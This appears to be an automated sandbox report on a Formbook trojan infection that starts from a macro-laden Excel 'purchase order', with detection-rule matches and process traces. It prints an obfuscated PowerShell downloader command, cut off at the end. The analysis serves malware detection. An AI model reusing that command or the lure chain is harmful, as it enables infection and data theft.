            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_023549F511_2_023549F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022D69FE11_2_022D69FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022F2E2F11_2_022F2E2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022DEE4C11_2_022DEE4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022D0F3F11_2_022D0F3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0235CFB111_2_0235CFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02332FDC11_2_02332FDC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234AC5E11_2_0234AC5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02362C9C11_2_02362C9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022F0D3B11_2_022F0D3B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022CCD5B11_2_022CCD5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0236123811_2_02361238
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C735311_2_022C7353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022BF3CF11_2_022BF3CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022ED00511_2_022ED005
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0233D06D11_2_0233D06D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C304011_2_022C3040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022D905A11_2_022D905A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234D13F11_2_0234D13F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0235771D11_2_0235771D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234579A11_2_0234579A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022F57C311_2_022F57C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022FD47D11_2_022FD47D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022D148911_2_022D1489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022F548511_2_022F5485
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022C351F11_2_022C351F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_023635DA11_2_023635DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_02373A8311_2_02373A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022E7B0011_2_022E7B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234DBDA11_2_0234DBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022BFBD711_2_022BFBD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0235F8EE11_2_0235F8EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0233F8C411_2_0233F8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234595511_2_02345955
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234394B11_2_0234394B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0234BF1411_2_0234BF14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_022EDF7C11_2_022EDF7C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0235FDDD11_2_0235FDDD
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028C981612_2_028C9816
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028EA10612_2_028EA106
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D1E3612_2_028D1E36
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028D1E3112_2_028D1E31
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CB79612_2_028CB796
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CB57612_2_028CB576
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeCode function: 12_2_028CB57312_2_028CB573
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E889F213_2_61E889F2
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E281B113_2_61E281B1
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E2007113_2_61E20071
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E243C113_2_61E243C1
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E4326B13_2_61E4326B
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E2225D13_2_61E2225D
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E6F68513_2_61E6F685
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E3D9AF13_2_61E3D9AF
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E3A91A13_2_61E3A91A
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E2F8E913_2_61E2F8E9
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E1BB5F13_2_61E1BB5F
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E4EA1D13_2_61E4EA1D
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E51DC413_2_61E51DC4
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E30D0C13_2_61E30D0C
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E42CFF13_2_61E42CFF
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E3ECBC13_2_61E3ECBC
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E4FC3D13_2_61E4FC3D
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E44E3313_2_61E44E33
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E15E0D13_2_61E15E0D
            Source: Mac Purchase Order PO102935.xlsOLE indicator, VBA macros: true
            Source: ~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 002459F4D4758011B4D7F36935F1FE323494B847F8C173A551076A3D30475EBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0232F970 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 022BE2A8 appears 60 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0230373B appears 253 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 022BDF5C appears 137 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02303F92 appears 132 times
            Source: sqlite3.dll.13.drStatic PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\find.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@15/34@16/8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\26QMPUB3.txtJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7D0B.tmpJump to behavior
            Source: Mac Purchase Order PO102935.xlsOLE indicator, Workbook stream: true
            Source: 5B430000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....T.......\.......|.......``.........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....T.......\.......|.......d`.........................s............................................Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: find.exe, 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Mac Purchase Order PO102935.xlsVirustotal: Detection: 9%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
